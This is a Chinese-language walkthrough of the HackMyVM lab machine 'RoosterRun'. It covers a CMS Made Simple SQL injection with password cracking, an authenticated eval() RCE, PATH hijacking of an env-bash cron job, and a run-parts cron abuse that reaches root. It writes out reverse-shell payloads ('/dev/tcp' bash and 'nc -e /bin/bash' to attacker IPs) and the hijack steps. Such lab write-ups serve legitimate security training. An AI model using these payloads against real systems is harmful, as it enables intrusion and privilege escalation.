HMV RoosterRun

信息收集

IP=192.168.0.205
nmap $IP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 00:25 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.0.205
Host is up (0.00027s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

有 80 ， 打开网页看一眼，看见了系统是 CMS Made Simple version 2.2.9.1，看看没有有啥漏洞。

尝试入侵

# searchsploit CMS Made Simple
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Executio | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting              | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion              | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting           | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection               | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilit | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities                    | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                          | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                 | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload     | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                         | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                        | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting  | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities                     | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery                     | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion        | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forg | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities                     | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                        | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)       | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload         | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authentica | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)          | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)                         | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Up | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution        | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution        | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning      | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                             | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload     | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Uploa | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary F | php/webapps/46546.py
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)                  | php/webapps/51600.txt
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template I | php/webapps/51599.txt
CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)            | php/webapps/51601.txt

2.2.9.1 版本以上，有几个 RCE，不过是 Authenticated 的 ，可以先用 SQL 注入试一下。

searchsploit -p 46635
  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
    Codes: CVE-2019-9053
 Verified: False
File Type: Python script, ASCII text executable

看了下脚本是 python2 的，直接运行报错，python2 连 pip 都没有，装了个 pip2 后，安装缺的包又报错了。我真服了。
不过打算自己改之前，在 github 找到了 python3 的。 https://github.com/Mahamedm/CVE-2019-9053-Exploit-Python-3

python csm_made_simple_injection.py -u http://192.168.0.205/ -c -w /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 1a0112229fbd699d
[+] Username found: admin
[+] Email found: [email protected]
[+] Password found: 4f943036486b9ad48890b2efbf7735a8
[+] Password cracked: homeandaway

账号密码有了，接下来就是 RCE 了。

searchsploit -p 49345
  Exploit: CMS Made Simple 2.2.15 - RCE (Authenticated)
      URL: https://www.exploit-db.com/exploits/49345
     Path: /usr/share/exploitdb/exploits/php/webapps/49345.txt
    Codes: N/A
 Verified: False
File Type: ASCII text

└─# cat /usr/share/exploitdb/exploits/php/webapps/49345.txt
# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html

Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.

// Vulnerable eval() code

if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

Reproduction Steps:

1. Login as administrator user and navigate to Extensions->User Defined Tags

2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");

3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 192.168.56.132 53690
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

看起来就是登录后，在 Extensions->User Defined Tags 里面添加代码，然后执行反弹就行。
找到对应的 User Defined Tags ，把 exec 里面的东西改改，保存到 Code 里，保存成功后，，点了 RUN，成功反弹。

pwncat-cs   -lp 1234
received connection from 192.168.0.205:54442
(remote) www-data@rooSter-Run:/var/www/html/admin$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

拿到了 www-data 的权限。

提权到 User

搜集信息

(remote) www-data@rooSter-Run:/var/www/html/admin$ cat /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
mysql:x:103:112:MySQL Server,,,:/nonexistent:/bin/false
matthieu:x:1000:1000:,,,:/home/matthieu:/bin/zsh


(remote) www-data@rooSter-Run:/var/www/html/admin$ cd /home/matthieu/
(remote) www-data@rooSter-Run:/home/matthieu$ ls -al
total 40
drwxr-xr-x  4 matthieu matthieu 4096 Sep 14 06:20 .
drwxr-xr-x  3 root     root     4096 Sep 24  2023 ..
lrwxrwxrwx  1 root     root        9 Sep 24  2023 .bash_history -> /dev/null
-rw-r--r--  1 matthieu matthieu  220 Sep 22  2023 .bash_logout
-rw-r--r--  1 matthieu matthieu 3526 Sep 22  2023 .bashrc
drwxr-xr-x  3 matthieu matthieu 4096 Sep 22  2023 .local
drwxr-xr-x 12 matthieu matthieu 4096 Sep 22  2023 .oh-my-zsh
-rw-r--r--  1 matthieu matthieu  807 Sep 22  2023 .profile
-rw-r--r--  1 matthieu matthieu 3915 Sep 22  2023 .zshrc
-rwxr-xr-x  1 matthieu matthieu  302 Sep 23  2023 StaleFinder
-rwx------  1 matthieu matthieu   33 Sep 24  2023 user.txt

(remote) www-data@rooSter-Run:/home/matthieu$ cat StaleFinder
#!/usr/bin/env bash

for file in ~/*; do
    if [[ -f $file ]]; then
        if [[ ! -s $file ]]; then
            echo "$file is empty."
        fi

        if [[ $(find "$file" -mtime +365 -print) ]]; then
            echo "$file hasn't been modified for over a year."
        fi
    fi
done

找到了一个神奇的脚本，看起来并没有什么实际的作用。不过第一行的 shebang 有点问题，平时都写 #!/bin/bash，问了 GPT，说是 #!/usr/bin/env bash ，系统就会从 env 寻找 bash 解释器。这样写是为了兼容不同的系统。
假如我劫持了 env 里的 bash ，那么就能执行我的代码？

echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

(remote) www-data@rooSter-Run:/home/matthieu$ which bash
/usr/bin/bash

(remote) www-data@rooSter-Run:/home/matthieu$ ls -al /usr/local/bin/
total 8
drwxrwx---+  2 root root 4096 Sep 24  2023 .
drwxr-xr-x  10 root root 4096 Jun 15  2023 ..

看见没有那个诡异的+号，我记得这玩意应该是 ACL。这意思是给我留了路子往里写 bash？？
可是我打算搞的时候，想起来个问题，我现在是 www-data ，我去劫持了，然后运行了，又有啥用。。。。 一时间陷入僵局。

再看看其他信息吧，看看是不是哪里漏了，拉过来一个 pspy64，等到 55 秒的时候执行。

wget 192.168.0.30:8000/pspy64
chmod +x pspy64
./pspy64

2024/09/14 09:59:38 CMD: UID=0     PID=1      | /sbin/init
2024/09/14 10:00:01 CMD: UID=0     PID=3874   | /usr/sbin/CRON -f
2024/09/14 10:00:01 CMD: UID=0     PID=3873   | /usr/sbin/cron -f
2024/09/14 10:00:01 CMD: UID=0     PID=3875   | /usr/sbin/CRON -f
2024/09/14 10:00:01 CMD: UID=0     PID=3876   | /usr/sbin/CRON -f
2024/09/14 10:00:01 CMD: UID=0     PID=3877   | /bin/sh -c /bin/bash /opt/maintenance/backup.sh
2024/09/14 10:00:01 CMD: UID=1000  PID=3878   | /bin/sh -c /home/matthieu/StaleFinder
2024/09/14 10:00:01 CMD: UID=0     PID=3879   | /bin/bash /opt/maintenance/backup.sh
2024/09/14 10:00:01 CMD: UID=0     PID=3880   | /bin/bash /opt/maintenance/backup.sh
2024/09/14 10:00:01 CMD: UID=1000  PID=3881   | bash /home/matthieu/StaleFinder
2024/09/14 10:00:01 CMD: UID=1000  PID=3882   | bash /home/matthieu/StaleFinder

1000 用户也就是 matthieu 会用 bash 执行 StaleFinder ，我们刚才看了 Path，/usr/local/bin/ 在前面，所以我们可以写一个 bash ，然后放到 /usr/local/bin/ ，然后等待执行。

echo 'nc -e /bin/bash 192.168.0.30 4567' > /usr/local/bin/bash
chmod +x /usr/local/bin/bash

在本地监听 4567 端口，等待执行。

pwncat-cs   -lp 4567

(remote) matthieu@rooSter-Run:/home/matthieu$ id
uid=1000(matthieu) gid=1000(matthieu) groups=1000(matthieu),100(users)

提权到 Root

拿到 User 后，就想到了刚才的定时任务里面有 UID=0 的，看看有没有什么可以利用的：

(remote) matthieu@rooSter-Run:/home/matthieu$ cat /opt/maintenance/backup.sh
#!/bin/bash

PROD="/opt/maintenance/prod-tasks"
PREPROD="/opt/maintenance/pre-prod-tasks"


for file in "$PREPROD"/*; do
  if [[ -f $file && "${file##*.}" = "sh" ]]; then
    cp "$file" "$PROD"
  else
    rm -f ${file}
  fi
done

for file in "$PROD"/*; do
  if [[ -f $file && ! -O $file ]]; then
  rm ${file}
  fi
done

/usr/bin/run-parts /opt/maintenance/prod-tasks

这次的 shebang 就很正常。看脚本，里面的 file##*. 是 bash 的字符串截取，"${file##*.}" 应该是取文件名的后缀。
脚本看起来就是来回复制文件，然后删除文件，最后执行 /usr/bin/run-parts /opt/maintenance/prod-tasks 。

run-parts 是执行目录下的所有脚本.
看起来不是很简单吗？我直接在 /opt/maintenance/pre-prod-tasks 下面写一个脚本，然后等待执行不就行了？

echo '/usr/bin/nc -e /bin/bash 192.168.0.30 7890' > /opt/maintenance/pre-prod-tasks/a.sh
chmod +x /opt/maintenance/pre-prod-tasks/a.sh

等了一会，脚本已经拷贝到了 /opt/maintenance/prod-tasks ，但是反弹一点反应都没。看一下 run-parts

╰─$ /usr/bin/run-parts -h

Usage: run-parts [OPTION]... DIRECTORY
      --test          print script names which would run, but don't run them.
      --list          print names of all valid files (can not be used with
                      --test)
  -v, --verbose       print script names before running them.
  -d, --debug         print script names while checking them.
      --report        print script names if they produce output.
      --reverse       reverse execution order of scripts.
      --exit-on-error exit as soon as a script returns with a non-zero exit
                      code.
      --stdin         multiplex stdin to scripts being run, using temporary file
      --lsbsysinit    validate filenames based on LSB sysinit specs.
      --new-session   run each script in a separate process session
      --regex=PATTERN validate filenames based on POSIX ERE pattern PATTERN.
  -u, --umask=UMASK   sets umask to UMASK (octal), default is 022.
  -a, --arg=ARGUMENT  pass ARGUMENT to scripts, use once for each argument.
  -V, --version       output version information and exit.
  -h, --help          display this help and exit.

看不到啥信息，man 一下：

RUN-PARTS(8)                                                                    System Manager's Manual                                                                   RUN-PARTS(8)

NAME
       run-parts - run scripts or programs in a directory

SYNOPSIS
       run-parts  [--test]  [--verbose]  [--debug] [--report] [--lsbsysinit] [--regex=RE] [--umask=umask] [--arg=argument] [--exit-on-error] [--help] [--version] [--list] [--reverse]
       [--] DIRECTORY

       run-parts -V

DESCRIPTION
       run-parts runs all the executable files named within constraints described below, found in directory directory.  Other files and directories are silently ignored.

       If neither the --lsbsysinit option nor the --regex option is given then the names must consist entirely of ASCII upper- and lower-case  letters,  ASCII  digits,  ASCII  under‐
       scores, and ASCII minus-hyphens.

       If  the  --lsbsysinit option is given, then the names must not end in .dpkg-old  or .dpkg-dist or .dpkg-new or .dpkg-tmp, and must belong to one or more of the following name‐
       spaces: the LANANA-assigned namespace (^[a-z0-9]+$); the LSB hierarchical and reserved namespaces (^_?([a-z0-9_.]+-)+[a-z0-9]+$); and the Debian cron script namespace (^[a-zA-
       Z0-9_-]+$).

       If the --regex option is given, the names must match the custom extended regular expression specified as that option's argument.

       Files  are run sequentially in the lexical sort order (according to the C/POSIX locale character collation rules) of their names unless the --reverse option is given, in which
       case they are run in the opposite order.

在没有给定参数的情况下，文件名必须完全由 ASCII 大写和小写字母、ASCII 数字、ASCII 下划线和 ASCII 减号组成。 再加上刚才脚本里面的 if [[ -f $file && "${file##*.}" = "sh" ]] 我突然意识到这货不会不能有.sh 后缀吧。
因为.sh 就破坏了这个规则，那我重命名下？

(remote) matthieu@rooSter-Run:/opt/maintenance/prod-tasks$ mv a.sh a

又等了一会，反弹还没成功。 卡了好久看了小白的 WP，发现这里要加 shebang，我又改了下：

echo '#!/bin/bash' > /opt/maintenance/pre-prod-tasks/a.sh
echo 'nc -e /bin/bash 192.168.0.30 7890' >> /opt/maintenance/pre-prod-tasks/a.sh
chmod +x /opt/maintenance/pre-prod-tasks/a.sh
# 等文件被拷贝到 prod-tasks 后，再改下名字
mv a.sh a

我滴妈，这次终于成功了。

(remote) root@rooSter-Run:/root# id
uid=0(root) gid=0(root) groups=0(root)

撒花。